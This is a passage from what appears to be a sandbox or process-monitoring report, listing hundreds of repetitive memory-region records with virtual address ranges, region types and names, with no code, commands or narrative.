pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15710 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15711 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15712 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15713 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15714 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 15715 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 15716 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15717 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15718 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15719 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15720 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15721 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15722 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15723 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15724 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15725 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15726 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15727 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15728 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15729 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15730 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15731 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15732 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15733 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15734 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15735 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15736 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15737 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15738 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15739 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15740 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15741 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15742 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15743 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15744 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15745 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15746 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15747 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15748 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15749 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15750 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15751 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15752 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15753 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15754 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15755 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15756 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15757 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15758 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15759 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15760 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15761 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15762 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15763 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15764 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15765 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15766 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15767 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15768 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15769 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15770 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15771 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15772 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 15773 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 15774 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15775 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15776 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 15777 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 15778 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15779 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15780 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15781 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15782 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15783 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15784 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15785 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15786 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15787 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15788 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15789 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15790 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15791 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15792 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 15793 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 15794 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15795 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15796 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15797 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15798 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15799 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15800 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15801 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15802 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15803 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15804 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15805 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15806 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15807 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15808 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15809 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15810 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15811 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15812 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15813 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15814 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15815 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15816 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15817 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15818 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15819 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15820 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15821 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15822 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15823 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15824 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15825 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15826 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15827 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15828 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15829 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15830 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15831 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15832 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15833 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15834 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15835 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15836 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15837 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15838 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15839 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15840 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15841 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15842 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 15843 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 15844 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15845 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15846 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15847 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15848 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15849 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15850 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15851 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15852 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15853 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15854 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15855 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15856 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15857 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15858 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15859 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15860 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15861 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15862 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15863 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15864 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15865 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15866 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15867 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15868 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15869 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15870 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15871 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15872 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15873 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15874 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15875 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15876 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15877 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15878 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15879 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15880 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15881 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15882 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15883 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15884 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15885 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15886 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15887 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15888 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15889 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15890 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 15891 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 15892 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15893 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15894 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 15895 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 15896 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15897 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = 